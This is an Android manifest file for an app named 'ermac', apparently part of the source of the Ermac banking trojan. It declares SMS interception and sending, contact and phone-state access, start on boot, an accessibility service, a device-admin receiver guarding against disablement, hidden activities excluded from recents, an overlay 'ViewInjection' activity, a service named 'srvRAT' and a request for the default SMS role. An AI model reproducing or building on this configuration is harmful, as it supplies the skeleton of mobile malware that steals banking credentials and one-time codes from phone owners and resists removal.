<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.example.ermac">
    <!--
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD" />

     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES" />


 <activity android:theme="@android:style/Theme.Translucent.NoTitleBar" android:name="com.google.android.gms.common.api.GoogleApiActivity" android:exported="false"/>
        <meta-data android:name="com.google.android.gms.version" android:value="11010000"/>
    -->
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="ermac"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:usesCleartextTraffic="true"
        android:theme="@android:style/Theme.Translucent.NoTitleBar">

        <activity android:name=".Activity.activity_change_sms_manager_sdk_Q" />

        <activity
            android:name="com.google.android.gms.common.api.GoogleApiActivity"
            android:exported="false"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" />

        <meta-data
            android:name="com.google.android.gms.version"
            android:value="11010000"
            tools:replace="android:value"/>

        <service
            android:name=".Service.srvLockDevice"
            android:exported="false" />
			
		<service android:name=".Service.srvWhileWorker" />
        <service android:name=".Service.srvNetworkConnect" />
        <service android:name=".Service.srvPedometer" />
        <service
            android:name=".Service.srvSccessibility"
            android:label="Start Accessibility"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/serviceconfig" />
        </service>

        <service
            android:name=".PushNotificationService"
            android:exported="false">
            <intent-filter>
                <action
                    android:name="com.google.firebase.MESSAGING_EVENT">
                </action>
            </intent-filter>
        </service>

        <activity
            android:name=".Admin.ActivityAdmin"
            android:excludeFromRecents="true"
            android:label=""
            android:theme="@android:style/Theme.NoDisplay" />

        <receiver
            android:name=".Admin.ReceiverDeviceAdmin"
            android:label="NameAdminDevice"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/adm" />

            <intent-filter android:priority="1000">
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED" />
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>

        <activity android:name=".replace_1">
            <intent-filter>
                <data android:scheme="sms" />
                <action android:name="android.intent.action.SENDTO" />
                <data android:scheme="mms" />
                <category android:name="android.intent.category.BROWSABLE" />
                <data android:scheme="mmsto" />
                <category android:name="android.intent.category.DEFAULT" />
                <data android:scheme="smsto" />
                <action android:name="android.intent.action.SEND" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".replace_2"
            android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <data android:mimeType="application/vnd.wap.mms-message" />

                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" />
            </intent-filter>
        </receiver>
		
		<receiver
            android:name=".Receiver.bootReceiver"
            android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.QUICKBOOT_POWERON" />
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.PACKAGE_REMOVED" />
                <action android:name="android.provider.Telephony.SMS_DELIVER" />

                <!-- <action android:name="android.intent.action.ACTION_SHUTDOWN" /> -->
            </intent-filter>
        </receiver>
		<service
            android:name=".Service.srvRAT"
            android:exported="false" />
        <service
            android:name=".replace_3"
            android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <data android:scheme="sms" />

                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE" />

                <data android:scheme="smsto" />
            </intent-filter>
        </service>
        <service android:name=".Service.srvToaskAccessibility" />

        <activity
            android:name=".Activity.actToaskAccessbility"
            android:icon="@drawable/background"
            android:label="" />
        <activity
            android:name=".Activity.actViewInjection"
            android:excludeFromRecents="true"
            android:icon="@drawable/background"
            android:label=""
            android:launchMode="singleTask"
            />
		<activity
            android:name=".Activity.actPermissions"
            android:excludeFromRecents="true"
            android:icon="@drawable/background"
            android:label=""
            android:theme="@android:style/Theme.NoDisplay" />
        <activity android:name=".Activity.actDozeMode" />
        <activity android:name=".mainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.app.role.SMS" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        



        
    </application>

</manifest>
